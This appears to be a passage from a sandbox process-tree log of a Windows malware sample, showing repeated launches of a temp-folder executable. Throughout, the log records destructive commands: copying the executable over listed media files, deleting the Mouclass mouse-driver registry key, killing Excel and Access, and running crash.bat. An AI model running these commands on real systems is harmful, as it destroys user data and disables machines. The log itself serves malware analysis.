    PID:7420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8396

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1568
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\955D.tmp\956D.tmp\956E.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8956

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K crash.bat
1⤵
PID:4612
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8356
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8440
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9300
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9588
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9692
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9816
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9364
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9956
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8608
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K crash.bat
1⤵
PID:3812

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
1⤵
PID:2576

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
1⤵
PID:4824

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4568

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1308

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4588

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4236

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4896

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5072

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
1⤵
PID:5080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K crash.bat
1⤵
PID:928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K crash.bat
1⤵
PID:4408
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8540
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9308
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9720
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9388
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9860
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9972
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9424
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8776
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9340

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5420

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3496
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E4C5.tmp\E4C5.tmp\E4D5.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9460

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5432

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5000
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCCA.tmp\DCE8.tmp\DCF9.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9516

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4984
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EA6E.tmp\EA6F.tmp\EA70.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9360

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5448

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4952

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4936
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DD46.tmp\DD46.tmp\DD47.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9632

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5464

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4908
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E88C.tmp\E88C.tmp\E88D.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8860

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4900
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E84D.tmp\E84D.tmp\E84E.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:7608

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4868
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EAFB.tmp\EAFD.tmp\EAFD.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9136

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5484

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5492

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5544

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4836
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DD45.tmp\DD46.tmp\DD47.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9608

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4828
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E560.tmp\E561.tmp\E562.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9096

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4812
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E1C8.tmp\E1D8.tmp\E1D9.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10228

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4804
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DBB0.tmp\DBC0.tmp\DBD0.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9240

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
1⤵
PID:4672

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5852

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5844

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5836

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5908

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6012

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6044

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5988

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5964

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5948

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6060

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6084

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6136

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3664

C:\Windows\system32\tskill.exe
tskill excel
1⤵
PID:2976

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4592

C:\Windows\system32\tskill.exe
tskill excel
1⤵
PID:1104

C:\Windows\system32\tskill.exe
tskill excel
1⤵
PID:2348

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5732

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5284

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5792

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5768

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5944

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5396

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:5772

C:\Windows\system32\tskill.exe
tskill excel
1⤵
PID:2384

C:\Windows\system32\tskill.exe
tskill msaccess
1⤵
PID:688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K crash.bat
1⤵
PID:188
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6380
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6616
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6720
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6652
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6792
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6816
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6760
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6156
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6872
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7728
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7240
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:2480
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7096
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7128
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8140
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8120
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6584
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7752
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7800
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6708
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9124
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9048
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7692
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8112
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7548
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8272
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8456
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7908
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9736
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9396
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9964

C:\Windows\system32\tskill.exe
tskill excel
1⤵
PID:2064

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6388

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6624

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6712

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6668

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6752

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6784

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:6808

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
1⤵
PID:2280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K crash.bat
1⤵
PID:1768
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6472
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6968
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7792
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6280
